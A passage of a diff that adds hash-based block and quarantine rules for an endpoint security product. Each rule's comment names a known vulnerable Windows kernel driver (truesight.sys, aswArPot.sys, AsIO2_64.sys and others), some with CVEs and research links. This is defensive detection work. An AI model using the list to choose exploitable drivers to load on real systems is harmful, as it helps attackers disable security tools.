+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977225Z",
+ "creation_date": "2026-03-23T11:45:29.977227Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977232Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "047c1d5bb80826a6f66c182fc8b5f66f59609a71e734117f20a4f98b9866bde5",
+ "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f52d9f7-efc2-5c5f-8196-3fde5fffca5a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969523Z",
+ "creation_date": "2026-03-23T11:45:29.969525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd3b38875c8b727f18cec382698624679d6413f02cf33d82a7c93b9595860b6d",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f595eb6-3947-593d-84da-03cce1c9ebdb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621985Z",
+ "creation_date": "2026-03-23T11:45:29.621987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621992Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e304e5d70d3f986f623fad7f4355d5218d8c1681e423b02db0946cbe1503eb76",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f5d6109-ab6e-5bd2-b200-9507e431d9e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821018Z",
+ "creation_date": "2026-03-23T11:45:30.821023Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821032Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e758221506628b116e88c14e71be99940894663013df3cf1a9e0b6fb18852b9",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f6a1a94-ee07-513b-b707-442307d5479b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152649Z",
+ "creation_date": "2026-03-23T11:45:31.152651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3bfb73ff837b9963ab2f7110b5996a08c569655c50809fbeea2efd74b7a6b5e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f6b720b-1c8e-5109-bf4d-255fb7abb4cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812277Z",
+ "creation_date": "2026-03-23T11:45:31.812285Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812300Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6141922e84398c9f7ee3fd81240882650ce1074bcd5b577182ddafb066a2f71f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f6bcb6d-177e-5e80-a010-b261c41da1c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150806Z",
+ "creation_date": "2026-03-23T11:45:31.150808Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "378150056e2c300fcb7d133f7c22e7a27f434532ee0c39dd0c16b433f47383b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f6c15cc-88e9-5d7c-b0d5-205e9e88450e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495492Z",
+ "creation_date": "2026-03-23T11:45:31.495494Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495500Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c77dc659c0fc9018f485b2ad49b94e503cbdb36287adf8b753c48b6d4c6e574b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f72f9ac-7ba3-5868-b435-cdce16001c32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487326Z",
+ "creation_date": "2026-03-23T11:45:31.487328Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d73b8a36374d9b20ec0b8c1157a51905b35efe1bca399ec9bb21f45b51174ef4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f8833ff-d0da-577a-98bf-a29ff1ff6404",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487790Z",
+ "creation_date": "2026-03-23T11:45:31.487792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487798Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d8b836c71c8667a139913f64a92befb05b7c5d033b317dc66d105f9fe4054ab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f91298e-302c-5c9f-ba6e-9950ab81b1ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143706Z",
+ "creation_date": "2026-03-23T11:45:32.143708Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143713Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68fcb5cf6723dd195cf6d929cf9c6aaaca649f6956eb3bd63c2c1a8391c0b21f",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f976fa7-08ae-5375-a0ee-c88e57fc7711",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459518Z",
+ "creation_date": "2026-03-23T11:45:30.459522Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cd75de5f54b799b60789696587b56a4a793cf60775b81f236f0e65189d863af",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3fa5da34-a66b-5d37-b1d3-7df59c137fb6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149591Z",
+ "creation_date": "2026-03-23T11:45:31.149595Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149603Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90856e306cd74eace432eae85219e1e0c9100a2f0a3e2f9eea2b0c6fd6c0e432",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3faa536d-dafc-59af-b476-996a2e0769cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820027Z",
+ "creation_date": "2026-03-23T11:45:31.820030Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820039Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a71a5982e38a10f35e7206c08d8ecdfe90af3266eebc29921ab440116640b169",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3fab97d8-ba09-5c2e-9101-1427b5fc4117",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982396Z",
+ "creation_date": "2026-03-23T11:45:29.982398Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982404Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36505921af5a09175395ebaea29c72b2a69a3a9204384a767a5be8a721f31b10",
+ "comment": "Vulnerable Kernel Driver (aka aswVmm.sys) [https://www.loldrivers.io/drivers/a845a05c-5357-4b78-9783-16b4d34b2cb0/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3faee5ce-940c-51b7-bf73-7a3c210becce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828854Z",
+ "creation_date": "2026-03-23T11:45:31.828856Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828861Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0eee29a0c648ac6f60b3d6ad1a989d17a2a81c966fda78ccedee43b1a29273f3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3fb6a4fd-eea4-5e6e-a857-a24bc7cf5943",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475959Z",
+ "creation_date": "2026-03-23T11:45:30.475962Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475971Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66f8bd2b29763acfbb7423f4c3c9c3af9f3ca4113bd580ab32f6e3ee4a4fc64e",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3fb90333-a41d-5ba8-98fe-1ba812a2001d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617097Z",
+ "creation_date": "2026-03-23T11:45:29.617099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617104Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6999caca67b37860abb5e6d95420d1b0d04966bc6674aac3bfde4e2394ad37fd",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3fb905eb-4b03-59b3-8e72-c2fe4ed4fc33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831966Z",
+ "creation_date": "2026-03-23T11:45:30.831969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a433e39aebe84fb5dcce175122236348841199310f361c14a0f7d940123260c3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3fbe5a7f-961b-5403-abf7-9fc90f6980ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156791Z",
+ "creation_date": "2026-03-23T11:45:31.156793Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e0cec48e65c52d54b7c2977fb1147740fa82951f72e5a9a802eec88ad5a2431",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ff41ceb-b7b8-5334-9f8f-e3e84dda7629",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825853Z",
+ "creation_date": "2026-03-23T11:45:30.825855Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825861Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92f4ae495acc3196299fd44196386ca021e639ca29c21b5c2c03b7c24f207078",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ff4a3d0-dcec-5bbf-abdd-38cdc8f3800d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610211Z",
+ "creation_date": "2026-03-23T11:45:29.610213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e58bbf3251906ff722aa63415bf169618e78be85cb92c8263d3715c260491e90",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ffbe2df-f941-570b-a9b9-83f9b8c6061c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619474Z",
+ "creation_date": "2026-03-23T11:45:29.619475Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
